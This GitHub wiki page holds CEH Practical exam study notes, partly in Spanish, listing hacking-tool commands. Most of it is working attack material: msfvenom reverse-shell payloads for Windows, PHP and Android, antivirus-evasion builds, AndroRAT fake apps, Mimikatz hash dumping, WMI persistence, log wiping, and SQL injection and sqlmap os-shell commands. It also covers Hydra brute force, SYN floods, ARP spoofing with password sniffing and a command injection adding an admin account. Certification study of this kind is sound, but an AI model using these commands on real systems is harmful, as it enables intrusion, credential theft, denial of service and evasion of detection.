Home - Dlopez86/CEH GitHub Wiki
https://book.thegurusec.com/certifications/certified-ethical-hacker-practical
Youtube Metadata https://mattw.io/youtube-metadata/
FTP Search https://www.searchftps.net/
IOT Seach
https://www.shodan.io/
Site Report
https://sitereport.netcraft.com/
https://whois.domaintools.com/
billcipher
python3 billcipher.py
NSLOOKUP
nslookup
set type=a and press Enter. Setting the type as “a” configures nslookup to query for the IP address of a given domain
To obtain the domain's authoritative name server
set type=cname
to determine the IP address of the name server
set type=a
REVERSE DNS [PTR]
dnsrecon.py -r 205.251.242.103-205.251.242.200
locate the network range
https://search.arin.net/rdap/?query=162.251.123.19
Find people
https://www.peekyou.com/
Sherlock (Find social media accounts)
Searchfy
gather personnel information
help
marketplace install all
modules search
workspaces create MW
db insert domains
show domains
modules load brute
recon/domains-hosts/brute_hosts
run
Show hosts
back
modules load recon/domains-hosts/bing_domain_web
run
theHarvester:
This tool gathers emails, subdomains, hosts, employee names, open ports, and banners from different public sources such as search engines
Grecon
Photon:
Photon is a Python script used to crawl a given target URL to obtain information such as URLs (in-scope and out-of-scope), URLs with parameters, email, social media accounts, files, secret keys and subdomains.
HTTrack
Web Crawler Web cloner.
It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer.
WebData Extractor
Wordlist Generate (from website)
cewl -d 2 -m 5 https://www.hola.com
EMAIL TRACKING Email tracker pro
PING
Determine packet/frame size
ping www.google.es -f -l 1500
Determine TTL (max 255)
ping www.google.es -i 3
OSINT
Discovering hosts
nmap -sP [Target IP Range] (Ping Sweep)
nmap -sn [Target IP Range]
nmap -sn -PR [Target IP Range] (Scanner with ARP)
nmap -sn -PU [Target IP Range] (Scanner UDP)
nmap -sn -PE [Target IP Range] (Scanner ICMP)
nmap -sn -PM [Target IP Range] (Scanner ICMP block)
nmap -sn -PS [Target IP Range] (Scanner SYN)
nmap -sn -PA [Target IP Range] (Scanner ACK)
nmap -sn -PO [Target IP Range] (Scanner IP protocol)
nmap -A -T4 [Target IP Range] (Agressive)
nmap -sC -sV -p- -A -v -T4 [Target IP Range] (Scripts Versions Ports and OS-SCAN)
sx arp [Target IP Range]
sx tcp -p 1-65535 [Target IP Range]
hping3 -8 0-100 -S [Target IP Address] -V
Advanced IP Scanner
MEGAPING (Windows)
OS Discovery
FQDN
nmap --script smb-os-discovery.nse [Target IP Range]
nmap -O -T4 [Target IP Range]
"auxiliary/scanner/smb/smb_version"
service postgresql start
msfconsole
Search [Module]
use auxiliary/scanner/smb/smb_version
SET RHOSTS [RANGE IP]
run
Generate Packets
hping3 [Target IP Address] --udp --rand-source --data 500
hping3 [Target IP Address] --flood
Colasoft Packet Builder
NetBIOS Enumeration
Windows
nbtstat -a [IP address of the remote machine] (Shows the netbios info of the remote machine)
net use (shows the netbios mounted images)
Linux
nmap -sU -p 137 --script nbstat.nse [Target IP Address]
SNMP Enumeration
nmap -sU -p 161 [Target IP address] (Check 161 port)
snmp-check [Target IP Address] (Get SNMP information with public string) (CAN GET USERS ACCOUNTS)
snmpwalk -v1 -c public [target IP]
snmpwalk -v2c -c public [Target IP Address]
nmap -sU -p 161 --script=snmp-sysdescr [target IP Address]
nmap -sU -p 161 --script=snmp-processes [target IP Address]
nmap -sU -p 161 --script=snmp-win32-software [target IP Address]
nmap -sU -p 161 --script=snmp-interfaces [target IP Address]
Softperfect Network Scanner
LDAP Enumeration
ADexplorer
nmap -sU -p 389 [Target IP address]
nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=dominio,dc=com"' [Target IP Address] (CAN GET USER ACCOUNTS)
ldapsearch -h [Target IP Address] -x -s base namingcontexts
ldapsearch -h [Target IP Address] -x -b "DC=DOMAIN,DC=com"
ldapsearch -x -h [Target IP Address] -b "DC=DOMAIN,DC=com" "objectclass=*"
ldapsearch -x -h 10.10.10.25 -b "dc=DOMAIN,dc=com" "objectclass=user" cn=user
Script Python (CAN GET USER ACCOUNTS)
python3
import ldap3
server=ldap3.Server('[Target IP Address]', get_info=ldap3.ALL,port=[Target Port])
connection=ldap3.Connection(server)
connection.bind()
server.info (CAN GET DOMAIN NAME and LDAP version)
connection.search(search_base='DC=dominio,DC=com',search_filter='(&(objectclass=*))',search_scope='SUBTREE', attributes='*')
connection.entries
connection.search(search_base='DC=cominio,DC=com',search_filter='(&(objectclass=person))',search_scope='SUBTREE', attributes='userpassword')
connection.entries
NFS
nmap -p 2049 [Target IP Address]
echo "[TARGET IP" >> Target.txt
superenum
python3 rpc-scan.py [Target IP address] --rpc
DNS
dig ns [Target Domain]
dig @[[NameServer]] [[Target Domain]] axfr (Zone Transfer)
nslookup
set querytype=soa
Enter the domain name
ls -d [Name Server] (Zone Transfer)
./dnsrecon.py -d [Target domain] -z (CAN CHECK DNSSEC)
nmap -T4 -p 53 --script dns-brute [Target Domain]
rDNS
nmap --script=broadcast-dns-service-discovery [Target Domain]
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='[Target Domain]'"
SMTP
nmap -p 25 --script=smtp-enum-users [Target IP Address] (CAN GET USERS ACCOUNTS)
nmap -p 25 --script=smtp-open-relay [Target IP Address]
nmap -p 25 --script=smtp-commands [Target IP Address]
SMB
GET SMB Version enabled: CAN GET SHARED FOLDERS:
smbclient //[IP]/C$
Message signing feature
nmap -p 445 -A [TARGET IP]
HTTP SERVER
nmap -p80,443 --script http-headers [TARGET IP]
Windows and Samba systems
enum4linux -a -n [Target IP Address] (CAN GET USER ACCOUNTS)
enum4linux -u USER -p PASSWORD -n [Target IP Address]
enum4linux -u USER -p PASSWORD -U [Target IP Address]
enum4linux -u USER -p PASSWORD -o [Target IP Address]
enum4linux -u USER -p PASSWORD -G [Target IP Address]
enum4linux -u USER -p PASSWORD -S [Target IP Address]
https://cve.mitre.org/index.html
https://nvd.nist.gov/vuln-metrics/cvss#
OpenVAS
Pentesting --> Vulnerability Analysis --> Openvas - Greenbone --> Start Greenbone Vulnerability Manager Service
NESSUS
NIKTO
Pentesting --> Web Application Analysis --> Web Vulnerability Scanners --> nikto
nikto -h (Target Website) -Tuning x (Scan with all tunning options enabled)
nikto -h (Target Website) -Cgidirs all (CHECK ALL CGI DIRECTORIES)
nikto -h (Target Website) (SHOWS HOST HEADERS)
responder -I eth0 [CAPTURE SMB SHARED INFORMATION]
Password Cracking Windows
L0phtCrack
Armitage
service postgresql start
armitage
**Ninja Jonin **
list (SHOWS all connected machined)
connect [n] (connect to a machine)
change (Change to a cmd)
MSFVENOM
https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[IP] LPORT=[XXXX] -f exe > Exploit.exe
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP]
exploit -j -z
sessions -i 1
PRIVILEGE ESCALATION
https://www.hackingarticles.in/metasploit-for-pentester-migrate/
getsystem -t 1
use exploit/windows/local/bypassuac_fodhelper
use post/multi/recon/local_exploit_suggester
BeRoot.exe
pkexec CVE-2021-4034
make (And execute)
PERSISTENCE
Wmi
upload Wmi-Persistence-master [Directory on the remote machine]
load powershell
powershell_shell
cd [Directory on the remote machine]
Import-Module ./WMI-Persistence.ps1
Install-Persistence -Trigger Startup -Payload "C:\Users\Administrator\Downloads\wmi.exe"
NFS MISCONFIGURATION
nmap -p2049 [IPRANGE] (Detecta el servicio NFS)
sudo apt-get install nfs-common
showmount -e [IP] (Check if an resource is available to mount)
sudo mount -t nfs [IP]:/home /tmp/nfs (Monta la unidad)
cp /bin/bash /tmp/nfs
sudo chmod +s /tmp/nfs/bash
./bash -p
Dump hashes
post/windows/gather/smart_hashdump
MIMIKATZ
load kiwi
help kiwi
lsa_dump_sam
lsa_dump_secrets
password_change
password_change -u Admin -n [NTLM hash of Admin acquired in previous step] -P password
CRACKING HASHES
john --format=NT --wordlist=wordlist.txt hash_ntlm.txt
john --format=raw-md5 --wordlist=wordlist.txt hash.txt
https://hashes.com/en/decrypt/hash
Limpiar huellas
clearev (METASPLOIT)
Clear_Event_Viewer_Logs.bat
wevtutil el (Display a list of event logs)
wevtutil cl [log_name] (Clear log)
cipher /w:[Drive or Folder or File Location] (overwrite deleted files)
export HISTSIZE=0 (Disable bash shell history)
history -c (Clear history)
history -w (Clear history of the current session)
Ocultamiento de ficheros
NFS Stream
type c:\tmp\calc.exe > c:\tmp\readme.txt:calc.exe
mklink mailicious.exe readme.txt:calc.exe
dir /r (Detect hidden files)
attrib +h +s +r Test
attrib -s -h -r Test
Ocultamiento de cuentas
net user Test /active:yes
net user Test /active:yes
net user Test /active:no
ESTEGANOGRAFÍA
Ocultar un mensaje en un fichero de texto
snow -C -m "this is the secret message you cannot read" -p "passoword" readme.txt readme2.txt
Mostrar un mensaje oculto en un fichero de texto
snow -C -p "passoword" readme2.txt.
En imagenes (OpenStego):
https://stegonline.georgeom.net/upload
COVERT CHANNEL
cc -o covert_tcp covert_tcp.c
LISTENER
./covert_tcp -dest [IP Propia] -source [IP emisor] -source_port 9999 -dest_port 8888 -server -file /message.txt
SENDER
./covert_tcp -dest [IP Destino] -source [IP Propia] -source_port 8888 -dest_port 9999 -file /message.txt
Enable, and Clear Audit Policies using Auditpol
auditpol /get /category:* (GET ALL POLICIES)
auditpol /set /category:"system","account logon" /success:enable /failure:enable (ENABLE AUDIT POLICIES)
auditpol /clear /y (Clear audit policies)
Crypters
swayze cryptor
Malware Analysis
HYBRID ANALYSIS
https://www.hybrid-analysis.com
Strings Search
Bintext
Packaging and Obfuscation Methods using PEid
PEiD.exe
DIE.exe (Detect It Easy)
Entropy
PE Explorer
Dependency Walker
IDA Debugger
GHIDRA
C:\Program Files\jdk-17.0.2+8
TCPVIEW && CURPORTS
DNS Query Sniffer
PROCESS MONITOR
REG ORGANIZER
SERVICE MANAGER (SRVMAN)
WINPATROL && Autorun for the Windows
Mirekusoft Install Monitor tool to detect hidden and background installations
PA File Sight (Check integrity of file system)
DriverView
MAC Spoof
macof -i eth0 -n 100
arpspoof -i eth0 -t [IP1] [IP2] (Informs (IP2) that the target system (IP1) has our MAC address)
Cain & Abel
DETECT ARP SPOOFING AND MONITOR MODE
Detect ARP with Wireshark expert information
Detect monitor with NMAP
nmap --script=sniffer-detect [Target IP Address]
MAC Changer
Smac tool (Change mac address -Windows-)
macchanger -a (Set random mac address -Linux)
macchanger -m [MAC] (Set a specific MAC address -Linux)
DHCP starvation
yersinia -I
"h" for HELP
"F2" to set DHCP mode
"x" to show available options
"1" To start attack
"q" to Stop attack
Wireshark
Filters:
https://insights.profitap.com/14-powerful-wireshark-filters-to-use
Expert information
Analize -> Expert information
Web clonner and Phising
setoolkit
Check URL phising:
https://sitereport.netcraft.com/
SYN FLOOD
Metasploit:
auxiliary/dos/tcp/synflood
hping3
hping3 -S (Target IP Address) -a (Spoofable IP Address) -p (PORT) --flood [TCP MODE]
hping3 -2 -p (PORT) --flood (Target IP Address) [UDP MODE]
hping3 -d 65538 -S -p 22 --flood
Raven-storm
rst
l4
ip [Target]
port [port]
threads [N]
run
HOIC
LOIC
ANTI DDOS GUARDIAN
Zed Attack Proxy (ZAP)
On the target Machine
On the hacker Machine
HETY
ARP Spoofing
Bettercap
bettercap -iface eth0
help
net.probe on (Detect hosts)
net.recon on (Read ARP Requests)
set http.proxy.sslstrip true (Enable SSLTRIP)
set arp.spoof.internal true (Enable spoofing)
set arp.spoof.targets [IP] (Setting the IP Target to ARP Spoof)
http.proxy on (Initiates http proxy)
arp.spoof on (Initiates ARP spoofing)
net.sniff on (Performing sniffing)
set net.sniff.regexp '.password=.+' (Regular expression to sniff passwords)
NMAP Scans
nmap -sP [RANGE IP] (Scans live machines)
nmap -sI [Zombie IP] [Target IP] (Scan using zombie machine)
HTTP/FTP Tunneling
HTThost
En la máquina de "Salto":
En la máquina "cliente":
Bypass Antivirus using Metasploit Templates
pluma /usr/share/metasploit-framework/data/templates/src/pe/exe/template.c
Change SCSICE
cd /usr/share/metasploit-framework/data/templates/src/pe/exe/
i686-w64-mingw32-gcc template.c -lws2_32 -o evasion.exe
msfvenom -p windows/shell_reverse_tcp lhost=[IP] lport=[PORT] -x /usr/share/metasploit-framework/data/templates/src/pe/exe/evasion.exe -f exe > /home/user/Desktop/stealth_shell.exe
Bypass Firewall through Windows BITSAdmin
Set httpd server with the file to download.
Open Powershell
bitsadmin /transfer Exploit.exe http://myserver.com/File.exe c:\File.exe
Gather information.
Ghost Eye (https://github.com/BullsEye0/ghost_eye)
Navigate to the directory of ghost_eye
pip3 install -r requirements.txt
python3 ghost_eye.py
[+] 1. EtherApe – Graphical Network Monitor (root) [+] 2. DNS Lookup [+] 3. Whois Lookup [+] 4. Nmap Port Scan [+] 5. HTTP Header Grabber [+] 6. Clickjacking Test - X-Frame-Options Header [+] 7. Robots.txt Scanner [+] 8. Cloudflare Cookie scraper [+] 9. Link Grabber [+] 10. IP Location Finder [+] 11. Detecting CMS with Identified Technologies [+] 12. Traceroute [+] 13. Crawler target url + Robots.txt [+] 14. Certificate Transparency log monitor
UNISCAN Tool
uniscan -u [URL] -d (Can get emails accounts)
HTTPRecon
ID Server
Netcat and Telnet
nc -vv [URL] 80
GET / HTTP/1.0
(shows etag)
telnet [URL] 80
GET / HTTP/1.0
Enumerate Web Server Information using Nmap Scripting
nmap -sV --script=http-enum [target website]
nmap --script hostmap-bfk -script-args hostmap-bfk.prefix=hostmap- [target website]
nmap --script http-trace -d [target website]
nmap -p80 --script http-waf-detect [target website]
Brute force with Hydra
https://github.com/gnebbia/hydra_notes
The Hydra parameter "-d" might help you when debugging, it prints the packet contents.
HTTP Basic Authentication
hydra -L users.txt -P words.txt www.site.com http-head /private/
HTTP Forms
hydra -L <users_file> -P <password_file> <url> http[s]-[post|get]-form \
"index.php:param1=value1¶m2=value2&user=^USER^&pwd=^PASS^¶mn=valn:[F|S]=messageshowed"
hydra -l admin -P pass.txt https://url.com https-post-form "index.php:param1=value123&user=^USER^&pass=^PASS^:S=Success!!"
HTTP Get Login Forms
hydra -l admin -P /root/Desktop/wordlists/test.txt http://www.website.com \
http-get-form "/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."
HTTP Post Forms
hydra 192.168.1.69 http-post-form "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" \
-L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
SSH
hydra -l root -M /path/to/ip/list.txt -P /path/to/passwordlist.txt ssh -t 4
FTP
hydra -L Usernames.txt -P Passwords.txt ftp://[IP]
SMB
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
Grab web technologies
whatweb -v [Target Web Application]
ZAP (find potencial vuln with advanced scanner)
Check for load balancer
dig [URL] (if shows severals IPs like the next example there is a load balancer)
lbd [url]
Identify Web Server Directories
nmap -sV --script=http-enum [target domain or IP address]
gobuster dir -u [Target Website] -w folders.txt
python3 dirsearch.py -u [Target Website]
Vulnerabilities scanner
Vega
N-Stalker Web Application Security Scanner
ClickJacking checker
echo "http://URL" | tee domain.txt
python3 clickJackPoc.py -f domain.txt
Identify XSS Vulnerabilities
python3 pwnxss.py -u [URL]
brute-force attack
using Burp Suite
https://portswigger.net/support/using-burp-to-brute-force-a-login-page
Enumerate WP users and pluggins
wpscan --api-token [API] --url [URL] --enumerate u
wpscan --api-token [API] --url [URL] --plugins-detection aggressive --enumerate vp
Metasploit:
use auxiliary/scanner/http/wordpress_login_enum
set PASS_FILE password.txt
set RHOSTS [IP Address]
set RPORT [PORT]
set TARGETURI [URL]
set USERNAME [User]
run
DVWA
| net user Test /Add
| net localgroup Administrators Test /Add
Send PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine] LPORT=4444 -f raw
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST [IP]
set LPORT [PORT]
run
Log4j Vulnerability
tar -xf jdk-8u202-linux-x64.tar.gz
mv jdk1.8.0_202 /usr/bin/
pluma poc.py
replace jdk1.8.0_20/bin/javac with /usr/bin/jdk1.8.0_202/bin/javac
replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java
nc -lvp 9001
python3 poc.py --userip [YOURIP] --webport [WEBPORT] --lport [YOURPORT]
Copy de generated link and paste on login page.
Detect SQL Injection Vulnerabilities
Manually
aaa' or 1=1 --
aaa';insert into login values ('fakeAdmin','123456'); --
DSSS
document.cookie
python3 dsss.py -u "http://vulnwebsite/sectionA.php?id=1" --cookie="[cookie]"
ZAP
SQLMAP
sqlmap -u "http://vulnwebsite/sectionA.php?id=1" --cookie="[cookie]" --dbs (Extracts databases)
sqlmap -u "http://vulnwebsite/sectionA.php?id=1" --cookie="[cookie]" -D Database --tables (Extracts tables)
sqlmap -u "http://vulnwebsite/sectionA.php?id=1" --cookie="[cookie]" -D Database -T Table --dump (Dump all data)
sqlmap -u "http://vulnwebsite/sectionA.php?id=1" --cookie="[cookie]" -D Database -T Table --os-shell (Get a Shell)
POST
sqlmap -u http://thehost/include/login.php --data "password=letmein&username=this_is_a_real_username" -p "username" --dbms=mysql
Crack WEP Keys
aircrack-ng fileWEP.cap
Crack WPA Keys
aircrack-ng -a2 -b [Target BSSID] -w password.txt fileWPA2.cap
Create reverse shell APK
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=[IP] LPORT=[PORT] R > Desktop/Backdoor.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [IP]
set LPORT [PORT]
exploit -j -z
sessions 1
sysinfo
PhoneSploit
adbport 5555
python3 -m pip install colorama
python3 phonesploit.py
3 (Connect new phone)
4 (Get a shell)
9 (download files or directories)
AndroRAT
python3 androRAT.py --build -i [YOURIP] -p 4444 -o FakeApp.apk
python3 androRAT.py --shell -i 0.0.0.0 -p 4444
help
deviceInfo
getMACAddress
getSMS inbox
Malware Analysis
Malwarebytes Security mobile application
Shodan
MQ Telmetric Publish Message.
MQTT
S3 Bucket Enumeration
ruby lazys3.rb [Company]
finds the open S3 buckets:
python3 ./s3scanner.py sites.txt
python3 ./s3scanner.py --include-closed --out-file found.txt --dump names.txt
python ./s3scanner.py --list names.txt
Hash MD5 CRC SHA1
Hash calc
MD5 calculator
Hash My Files
CRYPT
Cryptoforge
.cfg
BtcTextEncoder
CryptoAnalisis
CrypTool
AlphaPeeler
